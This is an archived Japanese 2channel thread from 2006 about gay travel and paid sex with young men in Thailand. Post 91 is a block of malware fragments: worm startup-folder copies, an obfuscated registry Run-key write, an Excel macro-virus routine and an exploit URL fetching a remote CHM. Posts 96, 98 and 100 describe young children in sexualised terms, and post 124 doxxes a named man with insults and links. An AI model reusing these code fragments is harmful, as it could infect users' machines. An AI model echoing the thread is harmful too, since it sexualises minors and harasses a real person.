2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆男を求めて♂バンコク・パタヤ・プーケットA◆

1 :禁断の名無しさん:2006/09/18(月) 21:38:31 ID:HyuhigtS
 ∧_∧
( ;´∀`) ゴーゴーバーでちんこ勃ってきた。
人 Y /
( ヽ し
(_)_)


2 ::2006/09/18(月) 22:08:23 ID:rYjNiWN/
ウソです

3 :禁断の名無しさん:2006/09/18(月) 22:16:28 ID:12u/nXQS
3!!!!!!!!!!!!!!!!!!!!!!!!!!

4 :禁断の名無しさん:2006/09/19(火) 17:51:17 ID:uCXOuXeX
また、おいらの話題で盛りあがるみたい。トホホ。

5 :禁断の名無しさん:2006/09/20(水) 22:33:05 ID:NZ4xCjeA
エゾハゲ、ここ見てるかな?

6 :禁断の名無しさん:2006/09/21(木) 12:48:17 ID:/RQvJIz9
タクシン失脚
タクシン失脚
タクシン失脚
タクシン失脚
タクシン失脚
タクシン失脚
タクシン失脚
タクシン失脚

7 :禁断の名無しさん:2006/09/21(木) 14:19:37 ID:C1Uhshey
スレ立てお疲れ様。

タイはいつもとかわりないですよ。

8 :禁断の名無しさん:2006/09/21(木) 14:39:17 ID:V1eMtkYK
Thailandから書き込んでるの?タイって平和な方なの?

9 :禁断の名無しさん:2006/09/21(木) 15:13:55 ID:22XQAqWh
平和だよ
お国柄なんだよねー
クーデターっていうか無理矢理人事異動って感じ。
街はいつもと変わらんなー

10 :禁断の名無しさん:2006/09/21(木) 15:54:44 ID:kwYzIb1G
タイって民主主義じゃなかったのね。
クーデターだなんて、民主主義だったら
選挙で倒せば良い事なのにね。

やっぱり恐い国だわ。

11 ::2006/09/21(木) 17:04:11 ID:Kf4QJIY+
>>8
タイ、バンコクからですー
ところどころで銃をかまえた軍人がいたけど、でも、そのほかは普通どおり
ですよ

12 :禁断の名無しさん:2006/09/22(金) 14:38:49 ID:SG+fcVNa
表面的には平和に見えるけど
公務員やってる友達とかは不安がってるよ。
今後の経済状況のこと。
アメリカも態度厳しいしね。

13 :禁断の名無しさん:2006/09/22(金) 20:38:32 ID:v7nLCLSN
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令
バンコク・パタヤに中出し警報発令

14 :禁断の名無しさん:2006/09/23(土) 23:27:58 ID:7gAVNcVN
ツアー旅行で指定ホテルが「インペリアル・クイーンズ・パーク」です。
5日間の旅程のうち、2日間は終日フリーの自由です。
ですので、買い物と食事はなるべく外でしたいです。
初めてのバンコクで少し不安です。
いちお、バンコクガイド06年はもっていきます。

治安に問題もなく、1人歩きも普通にできると言われていますが
じっさい、ここは行くなと言うような、気をつける地域はありますか?
ちなみに、スクムビット通りの郊外にホテルはあります。

西に行けば、セントラル、サイアムスクエアと栄えていて
食堂も買い物にも不自由しないのですが、歩いていける距離でしょうか?
初日と2日目の食事で、どこに行けばいいか迷います。
トゥクトゥクで交渉して移動するべきでしょうか?
クーデターの騒ぎは収まったようですし、治安面も問題ないようですし

15 :禁断の名無しさん:2006/09/24(日) 11:58:19 ID:jSI1eb96
>>14
ガイドブックを持ってるならよーくその地図を見て欲しいと思うのですが。

あえて言わせていただくと、あなたの泊まる予定のホテルは、「スクムビット
通りの郊外」ではない。どこへ行くにも便利な立地です。
セントラル、サイアムスクエアまで歩いていけ、とは言いません。
ホテルはBTSのプロンポンとアソーク両駅の中間ぐらいに位置するので、そこまで
歩くか、タクシーに乗って行き、BTSで移動するといいと思います。
アソークには地下鉄の乗換駅もありますし。プロンポンにも大きなデパートがあります。

BTS、地下鉄でいけないようなところに行く場合は、タクシーかトゥクトゥクを
使えばいいんじゃないでしょうか。

あ、まじめに答えちゃった。

16 :禁断の名無しさん:2006/09/24(日) 18:12:42 ID:V+OsFtM5
その辺りのホテルに泊まった場合はEmporiumとRobinsonに徒歩で行く
サヤームスケ〜にはバスに乗る
途中下車してCentral DptやCentral Plaza、Gaysorn Plazaに寄ったりもする
1番違いのバスに乗って変なとこに連れて行かれそうになっても
さっさと降りてまた別のに乗り換える。どうせ今は8B(高くなったな)だし
スカイトレインの駅を横断橋代わりに使えるので助かる
以前は信号があっても反対側へ渡るのが怖かったから
一緒に行動する者との兼ね合いもあるだろうから
タクシーやお抱えを利用するのも勿論いいけど
失敗しながらいくのも楽しいと思う
それともタイへは一回限りですか?
どちらにしても楽しい旅行を

17 :禁断の名無しさん:2006/09/24(日) 22:02:24 ID:kdHd6tht
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消
バンコク・パタヤに中出し警報発令取消


18 :禁断の名無しさん:2006/09/25(月) 23:13:52 ID:1yNd3+QU
>>14
どこの国に行こうが、心配なのは分かりますが、
地図の縮尺を考えれば、歩いていけるかどうかは分かりますよね・・
危険か危険じゃないのか心配なら、ガイドブック見ればいいのでは・・
危険なところを避けたいのなら、自由行動のないツアーに参加したほうがいいのでは・・
自分で考えようよ、もう少し・・




19 :禁断の名無しさん:2006/09/26(火) 13:28:55 ID:/s14pA2A
>>14
クーデター当日に渡航して昨日BKKから帰ってきました。
ニュースでは街を戦車が走り、軍がそこらじゅうにいるような報道でしたが
6日間一度もそんな光景は見ませんでした。
サイアム、シーロム、王宮周辺も通常警備のみで普段と変わりありませんでしたよ。

以前Qパークに泊まりましたが移動はほとんどタクシーでしてました。
シーロム(パッポン)まで50〜60Bぐらいですから。

20 :禁断の名無しさん:2006/09/26(火) 20:46:38 ID:b0v9q091
子供に菓子を投げて拾う姿を見て笑う。

子供に小銭を投げて拾う姿を見て笑う。

田舎に買○村を作ってやりたい放題。

そんな年寄りにはなりたくない。

しかし、何故あの国では問題にならないのだろうか?

外国人による買○村の存在はさほど珍しい事でも無いのだろうか?

不思議である。

21 :禁断の名無しさん:2006/09/27(水) 16:36:56 ID:HeDbKDdV
>>20
何十年前の話をしてるのかしら?
今どきタイ人が貧困だなんて思ってる奴はお前ぐらいだぜ!


22 :禁断の名無しさん:2006/09/27(水) 18:37:10 ID:BXntDq6A
>>21

>今どきタイ人が貧困だなんて思ってる

おまえは何処を読んでこう書いてるんだ?
読解力ないの?
何が言いたいか分かんねえの?
誰の事を言っているのか分かんねえの?
出直してきな(ケラケラ)。

23 :禁断の名無しさん:2006/09/27(水) 22:18:25 ID:eCOtykVO
>22 
デブのヅル剥けハゲ乙

24 :禁断の名無しさん:2006/09/27(水) 23:35:24 ID:h4C6BJZU
ケラケラって何だよ。キモッ

25 :禁断の名無しさん:2006/09/28(木) 00:17:25 ID:5/jbZEYK
>>22

あたしは分かるわー、誰のことかw。
あたしもあの方は好かないわ。


26 :禁断の名無しさん:2006/09/28(木) 00:28:04 ID:/CCxPG89
↑自作自演乙

27 :禁断の名無しさん:2006/09/28(木) 00:42:02 ID:5/jbZEYK
>>26

あら、違うわよ。
でもって、ムキになっているって事はあなたは>>21>>23>>24さんなのかしらw。
それとも、あの方の奉仕者なのかしら?
だったら同じ穴の狢の「買春者」ね。
汚らわしいわ!


28 :禁断の名無しさん:2006/09/28(木) 10:06:07 ID:7TYRg/ki
オネエ言葉、キショ

29 :禁断の名無しさん:2006/09/28(木) 10:40:34 ID:iA66E+TQ
↑その程度の反撃しか出来ないのw。
もっと楽しみにしていたのに(藁)。
馬○は大人しくしてなさいw。

30 :禁断の名無しさん:2006/09/28(木) 10:47:20 ID:iA66E+TQ
>>28
あなたも「買春者」なのかしら?w

31 :禁断の名無しさん:2006/09/29(金) 09:32:53 ID:6p87/CWu
↑お前よりマシ

32 :禁断の名無しさん:2006/09/29(金) 09:58:45 ID:OTR7kbZY
買春キモ

33 :禁断の名無しさん:2006/09/29(金) 11:31:34 ID:RBBMTWuE

人間やめますか?買春やめますか?(爆)。

34 :禁断の名無しさん:2006/09/29(金) 11:32:50 ID:RBBMTWuE
>>31

どうマシなのか教えてよ〜w。

35 :禁断の名無しさん:2006/09/29(金) 22:01:18 ID:4M3r9Z5A
買春は大人の嗜み。
初給料の貴重なお金で楽しむ大人の男の花道

36 :禁断の名無しさん:2006/09/29(金) 22:01:56 ID:4M3r9Z5A
↑同意

37 :禁断の名無しさん:2006/09/29(金) 22:02:31 ID:4M3r9Z5A
>>35
本当にそうだよな。ガキが多くて困る。

38 :禁断の名無しさん:2006/09/29(金) 22:03:19 ID:4M3r9Z5A
>>35You are right in your judgment.

39 :禁断の名無しさん:2006/09/29(金) 22:04:35 ID:4M3r9Z5A
>>38
yes!His action is legal!

40 :禁断の名無しさん:2006/09/29(金) 23:16:46 ID:RBBMTWuE
>>35>>37>>38>>39

同じIDなんですが、一人で遊んで楽しい?買春野郎さん(爆)。



41 :禁断の名無しさん:2006/09/29(金) 23:18:27 ID:RBBMTWuE
あっ、>>36もだったw。

42 :禁断の名無しさん:2006/09/30(土) 01:33:17 ID:71uczb6C
堂々とJFを払って部屋に行くの?
上階にあるレストランに行くような振りをしてエレベーターに乗るの?
その辺のテクをいろいろ聞きたいんだけど。。。。ダメかな

43 :禁断の名無しさん:2006/10/01(日) 04:06:56 ID:f6ImiAhF
何でもかんでも書きたがり教えたがりなんよ。
しょーもないことでもあいまいなことでもとにかく書きたい。
自分の存在を周囲に知らしめたくてどうにも自己コントロールが出来ない。
つまり目立ちたがり屋で自己中心なんよ。


44 :禁断の名無しさん:2006/10/01(日) 08:56:06 ID:YzBgeuD8
BKKに到着した瞬間に、頭の中がオトコの事やプーパッポンカリーでいっぱいになって
ピタピタのTシャツで「歩くカミングアウト」状態の買春釜よりはマシでしょ?

45 :禁断の名無しさん:2006/10/01(日) 14:50:41 ID:f6ImiAhF
ハゲですがピタピタのTシャツ着ても良いですか?

46 :禁断の名無しさん:2006/10/01(日) 16:55:41 ID:mHnJeud4
>43
Z爺のことですか?

>45
エゾハゲのことですか?

47 :禁断の名無しさん:2006/10/02(月) 22:55:21 ID:Xf4CN4Ps
>山の上のお寺だとかドンタンボーチやラン島などのボーイもいいですね。

ドンタンボーチって何ですか?(爆)

48 :禁断の名無しさん:2006/10/03(火) 00:49:44 ID:5M7lxSpC
>>45

禿げ禿げって、あなた・・・。
そんなにあの方に恨みがあるんですか?
結構優しい方よ、あの人。
本人もあなたの事だいたい誰か分かってるんじゃないかしら?
叩きも程ほどになさいね。

49 :禁断の名無しさん:2006/10/03(火) 00:51:31 ID:5M7lxSpC
>>45

あっ、書かれる前に言っておきますけど、
「本人降臨!」なんて書かないでね(藁)。


50 :禁断の名無しさん:2006/10/03(火) 17:44:23 ID:VJYfcOVy
>>山の上のお寺だとかドンタンボーチやラン島などのボーイもいいですね。

貴重な情報ありがとうございます。
わたしも次回は是非ドンタンボーチに出かけてみます。
もう一度復唱してみますが「ドンタンボーチですね!」(。_。)φメモメモ

51 :禁断の名無しさん:2006/10/03(火) 18:41:03 ID:5M7lxSpC
>>45>>50

>もう一度復唱してみますが「ドンタンボーチですね!」(。_。)φメモメモ

ミエミエだわねw。

いい加減にしてあげなさいよw。

52 :禁断の名無しさん:2006/10/05(木) 12:23:55 ID:eEZqw+v9
おいら帰国しました。
おいら帰国しました。
おいら帰国しました。

53 :タトママ:2006/10/05(木) 20:33:58 ID:Z/S71dGH
11月バンコク行く予定なんだけど
ホテル一泊一万円以上ばかりなのよ<<<フランスサイトから見て
それが相場なの??????????
安ホテルで最低1万よ??????????

54 :タトママ:2006/10/05(木) 20:35:28 ID:Z/S71dGH
一つ星で一マンコロ5千円よ!!!!!!!!!!!!!!!!!!
マジで???????????????

55 :禁断の名無しさん:2006/10/05(木) 21:08:50 ID:SJsvfswK
タトママは国外追放!
北朝鮮にでも行ってなさい!
ウンコたれが!

56 :禁断の名無しさん:2006/10/05(木) 21:49:24 ID:eZK8yBq6
高いと思ったらドンタンボーチで寝なさい!!!!!

57 :禁断の名無しさん:2006/10/05(木) 21:58:00 ID:77E5HHpi
>>53

タトママさんだぁ(本物?)。
1万円だったら結構良い所泊まれるわよ(3〜4星級)。
ホテルと変わらないサービスアパートメントならもっと良い所泊まれるわよ。

58 :禁断の名無しさん:2006/10/06(金) 00:29:10 ID:tZuV4EAR
10/24〜 TG623にてタイ行き決定!
帰国は12/3の予定よ

59 :禁断の名無しさん:2006/10/06(金) 15:07:17 ID:RmNkrnGi
>>53
一泊\2000以下で泊まれるホテルがたくさんありますよ。
フランスのサイトじゃなくてタイのサイトからのほうがオススメ。

60 :禁断の名無しさん:2006/10/07(土) 18:09:21 ID:4/CiNrip
>>58
お仕事は何をなさっているのでしょうか?
40日以上も休めるなんて羨ましいです。

61 :禁断の名無しさん:2006/10/08(日) 01:10:12 ID:F4mtL7DD
休むんじゃなくて出張というのもアリ

62 :禁断の名無しさん:2006/10/08(日) 01:28:00 ID:fVLPlA75
専門職・社会的地位の高い人は、基本的に連続休暇は取りたくても無理。





63 :禁断の名無しさん:2006/10/08(日) 01:28:32 ID:fVLPlA75
248 名前: 禁断の名無しさん 投稿日: 2006/04/25(火) 18:13:48 ID:nNiKHN37
>>241
5月1・2日に有給休暇が取れる時点で、必要性が低い労働者。
専門職・社会的地位の高い人は、基本的に連続休暇は取りたくても無理。


64 :禁断の名無しさん:2006/10/08(日) 01:30:11 ID:fVLPlA75
240 名前: 禁断の名無しさん 投稿日: 2006/04/23(日) 12:56:34 ID:KV4WEo/O
>229
8日間も休みが取れる人は、社会・会社からの必要度が低いブルーカラーの
人たちです。休んでくれた方が経費節約になるから。


65 :禁断の名無しさん:2006/10/08(日) 01:31:35 ID:EdbSNdiT
そんなに休んでばかりいると、頭が腐るよ!
     もしかして、ニートですか? だとしたら、議論の範疇外だよ(w
     真面目に努力して社会的地位が上がれば、>>240>>248の意味が分かると思う。
     ガンバってください。
     生産性の低い人間は、休みの日に活発に消費をして、日本経済に貢献してください。
     でも生活保護はダ〜メダ〜メ!w



66 :禁断の名無しさん:2006/10/08(日) 01:52:31 ID:F4mtL7DD
だからさ
休みで行くんじゃなくて「しゅっちょう」では。。。

67 :禁断の名無しさん:2006/10/08(日) 02:47:02 ID:16+NVash
残念ながら出張族じゃないの
バンコクの安アパート暮らしがお似合いのチープな女よ。

>>60
旅行者相手の仕事です。今シーズンの契約はもうすぐ終わって春までレイオフ
12月に臨時採用。1〜3月は実家の商売を手伝わされるの
とマジレスしておくわ。

アタシみたいな社会的地位の低いオカマが、タイで外貨をバラ撒いてくるなんて
日本経済にマイナス要因よね。非国民は死んだ方がいいわねw

68 :禁断の名無しさん:2006/10/09(月) 01:16:31 ID:MGg5U1I1
>>67
たとえ非国民と言われようが、社会的地位が低いと言われようが
タイに長期で行けるあなたのことを羨ましいと思う人のほうが多いはず。

楽しんできてくださいね☆
あたしも昔、転職の為仕事辞めて次の会社で働くまでの一ヶ月間
タイに滞在した経験があるんだけど(安アパート暮らしよw)、
脳味噌とカラダがタイ化しちゃって社会復帰に時間がかかったわ。
くれぐれも向こうで沈没なさらないようにね。

69 :禁断の名無しさん:2006/10/09(月) 01:52:56 ID:ec2J+qyc
マジでこれ登録した方がいいょ(*^−')ノ
http://550909.com/?f7906022

70 :禁断の名無しさん:2006/10/11(水) 06:17:37 ID:FRgEqvhv
サンクトチュアリってなんざますの?
サンクチュアリじゃございませんこと。

ナックルアってなんざますの?
NAKLUAはナークルアとかナクルアと読むざますのよ!
ナーは田んぼ、クルアは塩で塩田って意味ざます。

71 :禁断の名無しさん:2006/10/11(水) 22:36:23 ID:CSRenx9L
中田氏のぼうや可哀想に、頭に台湾ハゲいっぱい作って悩みが多いのね。


72 :禁断の名無しさん:2006/10/12(木) 00:02:52 ID:6g2rEmrI
トドもビックリ!初めて聞いたわ〜ナックルア(爆〜〜〜)
(。_。)φメモメモ

(。_。)φメモメモ

(。_。)φメモメモ


サンシャインレジデンス、深夜の騒音五月蝿過ぎ!
耳の遠い爺さん向きホテル(爆〜〜〜)

73 :禁断の名無しさん:2006/10/12(木) 09:48:16 ID:S/uyTpMb
http://thaigay.seesaa.net/article/25284525.html#more

↑そんなにラ茶ダーってディープな街だったの?
館内に多数のコンドームって・・・行ってみたい・・・

PS 中出氏のブログってどうやって探すの?

74 :☆タト専ママ☆:2006/10/12(木) 19:02:40 ID:I96XFAut
オール!!!!!!!!!!!!!!!!!!
てか、オール!!!!!!!!!!!!!!!!
チケット予約したわ!!!!!!!!!!!!!

お茄子振りかざして大暴れバンコック!!!!!!!!!!!

てか、男漁り目的じゃないわ?????????<<<<大人しくホテルのプールで横座りしてるわ


75 :禁断の名無しさん:2006/10/12(木) 19:03:35 ID:gIQvM2VX
>>73
検索はグーグルで「タイのぼうや」よ!

76 :禁断の名無しさん:2006/10/13(金) 00:29:37 ID:oR9mKtuh
>>75
それでやってもでない
「げえええい」で検索しれ!

77 :禁断の名無しさん:2006/10/13(金) 01:25:33 ID:Q1S8CImN
>>76
ドアホなおっさんやな〜!ヤフーちゃうぞ!
検索はグーグル(google)でするんじゃ!!

78 :禁断の名無しさん:2006/10/14(土) 14:30:47 ID:65CLkHfW
初めての海外旅行(フリープランのツアーで3日〜5日)
持って行くと役に立つお勧めガイド本ありますか?
ツアーが終了後、個人でタイを回ろうと思っています。

行き先は一番がタイ、その次が台湾、インドです。(タイになると思います)
自分は英語も中国語もタイ語もできません。
ホテルでの交渉、食堂での会話、知らない土地を移動と不安はあります。

やはり、初心者=地球の歩き方のシリーズが良いのでしょうか?
それとタイはどのぐらい英語が通じますか?


79 :禁断の名無しさん:2006/10/14(土) 15:09:11 ID:4ZHQ3Gk7
送金のおねだりって
1万罰が相場ですか?

80 :禁断の名無しさん:2006/10/14(土) 19:07:23 ID:+X0VpMX4
>79
5000罰〜2万罰の送金してぼうやを独占する人多いわよ。
送金してもぼうやを自分のものに出来ないのは中田氏ぐらいね!
カモられてるのに送金してる馬鹿な中田氏。滑稽だわ。

ブログに載せてるぼうやの写真、暗くて見づらいけど
明るく引き伸ばして御覧なさい!なに、あの顔(爆)
こっちが金貰いたいわ!

81 :禁断の名無しさん:2006/10/14(土) 21:56:46 ID:4t8Gmox9
>>80

あんたさ、ココでぶつぶつ言うより本人の所行って、言ってあげなさいよ。

それに「坊や」の趣味なんて人それぞれなんだから、別に良いんじゃない。

>こっちが金貰いたいわ!

あなたはお金もらえるくらいの美貌なのねw。

82 :禁断の名無しさん:2006/10/14(土) 22:34:15 ID:Wgy+s8DP
送金ってどうすれば安上がり?
日本の銀行のカード渡しておくのがいい?
みんなどうしてるの?

83 :禁断の名無しさん:2006/10/15(日) 00:09:34 ID:qHK4JuGu
>>80
いくら送金しようが構わないけど、独占出来るなんて思わないほうが
幸せかも。
複数名から送金してもらってるボーイ多過ぎw

84 :禁断の名無しさん:2006/10/15(日) 18:08:34 ID:NIQPGSQV
5000〜20000Bですか
かなりの額ですね、あちらでは
いまだに月給が1万罰台の職種も多いと思うけど
その上マルチでおねだりとは坊や達もすごいな

85 :禁断の名無しさん:2006/10/16(月) 03:17:20 ID:aUhLffko
10月中旬、オトコ街のフーチャーボーイは全開でしたな。でもわしの方がまだ売れるぞみたいなデブがboy、驚きだしたな。

86 :禁断の名無しさん:2006/10/16(月) 04:53:25 ID:dO6j51/t
>>85
あなた、尋常小学校もサボって行かなかったの???

教育勅語暗記してそうな世代かしら???

87 :禁断の名無しさん:2006/10/18(水) 23:29:11 ID:Jptt/RCm
パタヤのボーイから
体調が悪くて仕事ができない。
一万円必要だとメールが来たわ!
とりあえず5000罰振り込んじゃった!
心配だから11月3日から会いに行ってくるわ。
その子とっても可愛いのよ!

88 :禁断の名無しさん:2006/10/18(水) 23:30:47 ID:Jptt/RCm
>87訂正

パタヤのボーイから
体調が悪くて仕事ができない。
一万罰必要だとメールが来たわ!
とりあえず5000罰振り込んじゃった!
心配だから11月3日から会いに行ってくるわ。
その子とっても可愛いのよ!

89 :禁断の名無しさん:2006/10/18(水) 23:33:38 ID:AsZb2ayV
>>87
ピンピンして働いてるよw
1万円でOKの鴨には次は1万8千円って攻撃してくるよ!ww
タイボーイの常套手段にやられたね!
ま、ご愛嬌ということで。。


90 :禁断の名無しさん:2006/10/18(水) 23:38:12 ID:AsZb2ayV
>89訂正
円→罰

91 :<body onload=window()>:2006/10/20(金) 04:30:40 ID:Dmg4lTxV
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ


92 :禁断の名無しさん:2006/10/22(日) 05:08:57 ID:5zRT1Mrx
パタヤのNくんからメールが来たんだけど
私のことが一番好きだって!!!
来週からまた会いに行ってくるわ。おほほ。

93 :禁断の名無しさん:2006/10/22(日) 05:34:42 ID:PAzWNRNJ
まるで少女の様な整った顔立ち、しなやかで美しい肢体、
自分の大事な体と、男の子としてのプライドを売ってまで家族を養う
いたいけな子らを見てるとH出来なくなるな

94 :禁断の名無しさん:2006/10/22(日) 07:31:12 ID:+QSUzRGZ
>>92

ネタ おつかれ

95 :禁断の名無しさん:2006/10/22(日) 10:02:32 ID:sj6X9Igm
>>93
お金だけあげれば
いいじゃない?

96 :禁断の名無しさん:2006/10/22(日) 15:56:31 ID:2MPvaVzU
ラチャダーのフォーチュンタウンのトイレで6、7歳の坊やが小便器の前で発展と言うか大人のあそこを見て、、。
BKKでは中学生などのゲイはトイレでたまに見るけどこんな幼児?みたいな子が。マネーボーイかしら?私は恐ろしくって、かかわりたくないのであそこも見てなかったけど。

97 :禁断の名無しさん:2006/10/22(日) 19:53:29 ID:XRp5lQdv
見たところで 黒い赤ちゃんチンコだろ。

98 :禁断の名無しさん:2006/10/23(月) 01:17:32 ID:ERl+xHBi
>>96
バンコクにはラオスとかカンボジアの子供を乞食にレンタルする商売あるのよw
アタシが思うには、プロの乞食が借りてきた少年に売春させてるんじゃないかと

99 :禁断の名無しさん:2006/10/23(月) 19:46:30 ID:84gnAxym
>22th-OCT future-boyではfucking-show-contestがございました。まさに「the fucking-show」を決めるcontestなんです。

22thってなんだ?

100 :禁断の名無しさん:2006/10/23(月) 20:09:17 ID:dNmSPVew
>>96
そうね、私を誘うような目つきだったわ。とても7,8歳の坊やの目じゃないわ。でも年齢はその程度。
裏に何かの組織があるのかしら?彼のあそこは見てないのよ。だって私の趣味は3、40代のタイ人だもの。

101 :禁断の名無しさん:2006/10/23(月) 21:58:14 ID:y6ekuGh4
>>99
Z爺のハッタリ英語(爆)
あれで、よくビジネスできるもんだわ(爆〜爆〜爆〜爆)

102 :58:2006/10/24(火) 08:23:06 ID:6gdSqCa4
今からタイに出発いたします
皆様ごきげんよう。

103 :禁断の名無しさん:2006/10/24(火) 16:16:29 ID:pe36/iP6
>100

見張り役の大人が近くにいて監視してるんだろう

104 :Z爺:2006/10/24(火) 16:48:04 ID:blK6JAOe
>99
ごめんあそばせ〜
22thは間違いで21th-OCTに訂正しておきます(笑〜〜〜)
あら、これも間違いだったかしら(爆)


105 :禁断の名無しさん:2006/10/24(火) 18:40:09 ID:pe36/iP6
日にちの正誤は分からんが
21st 、22nd または何も付けない  と思う

106 :禁断の名無しさん:2006/10/24(火) 21:47:16 ID:6q4MsS8x
>>105
マジレス恥
みんなわかってるから。
わかってないのはZ爺だけ。

107 :禁断の名無しさん:2006/10/25(水) 02:06:45 ID:Z+EYtBHI
無駄に英語で書かなきゃもっと読みやすい文章になるのにね。
カタカナで書くことに抵抗でもあるんだろうか?

108 :105:2006/10/25(水) 16:39:13 ID:p8TRBZbL
ホントだ
しっかりと読まなかったんでネィさんの深みが分からなかった
バーツとして例の運河沿いとフォーチュンタウン(場所知らない)のトイレに
下見に行かせてくれ! 

109 :禁断の名無しさん:2006/10/26(木) 19:33:44 ID:fBxKCJl3
オナニーをすると、男性ホルモンが激しく分泌される
その結果、禿げやすくなる・老けやすくなる
みんなでオナニーを自粛しましょう




110 :禁断の名無しさん:2006/10/27(金) 03:58:35 ID:r/KNXA0q
>>109
おいら、ハゲの友達にそのように伝えておきます。
ブロクでおいらと友達は交換日記するくらい仲良しですから。

111 :禁断の名無しさん:2006/10/27(金) 22:25:16 ID:4wympdQH
は〇むのトドデブランド、掲示板でトドが吠えてますが何があったの?



112 :禁断の名無しさん:2006/10/27(金) 23:10:54 ID:zcvfyJQL
http://777soul.com/coolboys/

113 :禁断の名無しさん:2006/10/28(土) 22:01:59 ID:OFG+itcU
Z自慰、プライド高いのねw
>>99>>101に対抗してるわよ。自分の掲示板で。
「英語の資料を精査」ですってw
三流大出ってプライドだけ高いからヤなのよね笑〜〜〜〜〜

114 :禁断の名無しさん:2006/10/29(日) 13:12:16 ID:C3HFUwbb
三流大学って何処なの?大学や学部が気になるわぁ。
でも30年以上前に大学に行ってたなんて、金持ちだったの?当時の進学率は低かったのじゃないの?

115 :禁断の名無しさん:2006/10/29(日) 22:04:52 ID:epEctr0y
国士舘かしら?拓殖?それとも日本大学?

それでは失礼ね。明治か中央の夜学かも。

116 :禁断の名無しさん:2006/10/30(月) 18:03:00 ID:ZRsrE5wa
>>113
プライド御三家

Z=ヅラ=トド

117 :禁断の名無しさん:2006/11/02(木) 17:30:09 ID:SmSqlCh6
すんません〜〜!

プーケットのゲイビーチの場所教えてください。

よろしくです。

118 :禁断の名無しさん:2006/11/02(木) 18:48:58 ID:8rTU6vfZ

  ↑
パトンビーチ

119 :禁断の名無しさん:2006/11/03(金) 15:13:09 ID:snudact1
Zとトドは分かるんだけど、ハゲって誰?

120 :禁断の名無しさん:2006/11/05(日) 23:52:10 ID:WIfqAn5P
すんません〜

タワンに個室ありますか?

121 :禁断の名無しさん:2006/11/05(日) 23:53:47 ID:rR7+txzs
掲示板で管理人さん早く新作アップしてと言われ
パスワード忘れたから出来ないとバカ正直なレス付けるから
掲示板は荒らされ放題やられ放題w

何を書かれても、消すことも閉鎖することもできないようだ
これを世間では本当のおばかさんと言うのだろう

いや、それ以前にみっともない全裸姿をさらしている時点で
おばかさんだったのかもしれない

ttp://nudepia.s4.x-beat.com/nude-gallery/Frameset-3.html
ttp://nudepia.s4.x-beat.com/nude-gallery/odaiba/index.htm


122 :禁断の名無しさん:2006/11/06(月) 21:09:28 ID:TdT0EzuN
>>120
ゴリラボーイと一戦を交えたいわけ?それならボーイに尋ねると知ってるわ。スリウォンホテルなんかは400B程度かな、時間貸しで。

123 :禁断の名無しさん:2006/11/06(月) 21:43:39 ID:gRl/kjBS
http://p.pita.st/?m=aovjchjs
僕どうですか?><;

124 :2丁目の仲通りやアーティでよく見かけるJOMAのことで:2006/11/06(月) 21:50:42 ID:Hz7KsfOK
フィリピーナだってことをなぜだか隠す
元芸能人のJOMAってドキュンなホモがいるのですが
性格はすごい神経質で、女ぽくて、短気なギャル男がいて
本人の日記によると・・・
昔父親に包丁向けたこともあったそうです

顔や髪や服ばかりいつもいじっていて、マイミクでも
自分が1番美しいと思い込んでいます
言ってることは、頭が悪いとしか思えないようなことばかり

いつも嘘ばかりついていて
大学に行かなかったのは、親の負担を考えてと本人は言ってますが
偏差値の低い高校出身で、ただ勉強が出来なかったからです。
JOMAと過去に付き合った男は多数います
でも人格に問題があるため、あまり長続きしてないようでした


JOMAは男にふられると『裏切られた、もて遊ばれた』などと被害者妄想が出ます。
悪魔を見たとか、統合失調症のような
おかしなことを言うこともあったよ

ttp://www24.big.or.jp/~ker/upl/img-box/img20061106143247.jpg
JOMAの顔写真一覧です、目つき悪い〜

ttp://www.frontier-road.com/joma/top.htm
事務所のHPに載ってる、ジョーマの経歴と自己紹介

ttp://www.frontier-road.com/treebbs/0/485_all.html
所属していた事務所の旧BBS、JOMA本人が名前変えて自分自身を弁護する書き込みしてます

ttp://mixi.jp/add_bookmark.pl?id=405374
この部分なら見ても平気ですが、日記の中身やフォトなどをクリックして見ると足跡が残るよ

125 :禁断の名無しさん:2006/11/07(火) 02:53:03 ID:w2b11ZOc
バンコク情報ですが。。。サラディーン駅周辺でマッチョ系が集まるサウナやマッサージを知ってるかたいますか??

126 :禁断の名無しさん:2006/11/08(水) 17:50:57 ID:G/xcCMyZ
パタヤーのゴーゴーボーイから聞いた話なんやけど
ファランが可愛い子ばかり集めてポルノビデオを撮影してる
コンドがジョンテンビーチにあるとのこと、どこか知ってます?
近くにゴルフ場があるらしいわ!けどゴルフ場なんてあったかいな?

